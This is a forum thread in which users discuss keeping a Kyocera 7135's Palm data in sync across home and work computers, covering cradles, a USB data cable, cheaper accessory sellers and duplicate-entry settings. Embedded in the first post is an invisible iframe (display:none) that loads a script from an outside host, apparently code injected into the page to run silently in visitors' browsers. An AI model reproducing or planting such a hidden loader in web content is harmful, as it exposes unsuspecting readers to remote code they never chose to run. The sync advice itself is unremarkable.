Syncing on two computers

I currently sync my palm at home and work. I use two hot sync cradles.

I will be purchasing a 7135 in the next few days/weeks. I would like to continue to hot sync on both computers. What are my options to accomplish this.

Obviously, I could buy another 7135 cradle or transport the one between the computers, but does anyone have a better alternative. (I do not have IR capabilities on either computer)

It appears from what I have read on the Kyocera website, that the data cables do not allow hot syncing for the palm part of the phone. Is my understanding correct?

Thank you in advance for any assistance.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You pretty much answered your own question. The only other option that I see is to buy a laptop with IR capability.

Good Luck.

Sorry

I did my first sync on my laptop using the true USB data cable while on vacation. When I got back to the office I connected the cradle and did another sync to my desktop computer. I got a message about syncing to multiple computers I don't remember off the top of my head what it instructed me to do, but the directions were very clear on how to carry this out. Using the usb cable on the laptop is great b/c you can use it for data calls also.

Is this a separately purchased cable, or can the hotsync cradle cable be used in this manner so that I would only have to carry the cable and not the whole cradle between work and home?

You need the separate USB cable you can get from Kyocera.

Does anyone know if there are third party cables? I was hoping for something less that $40

after reading the responses to my post, i have found that Dan on ebay sells Kyocera OEM equipment at reduced prices, a search of this site should get you what you need (there is a thread about discounted 7135 accessories)

When I've tried that (sync'ing to two different computers) I frequently get duplicated address book or calendar entries.

usually, a message will be generated when you sync advising of duplications. it usually arises because information is entered twice (ie once on one computer and once on the pda but not identically) and then synced and the pda can't reconcille the two in the desktop software

There is a setting in the hotsync pulldown menu for setup, make sure the last line tells the handheld to overwrite the computer on both computers.

also, next to the user selection box (upper left hand corner of the desktop) is an icon of a blue and gray person almost standing on top of each other, this icon searches for and deletes duplicate entries.

you must also regularly hot synce on both computers

Yep, check with Dan at danscellphones@aol.com and see if he has the 7135 USB sync cable, and compare his price to buying direct from Kyocera.
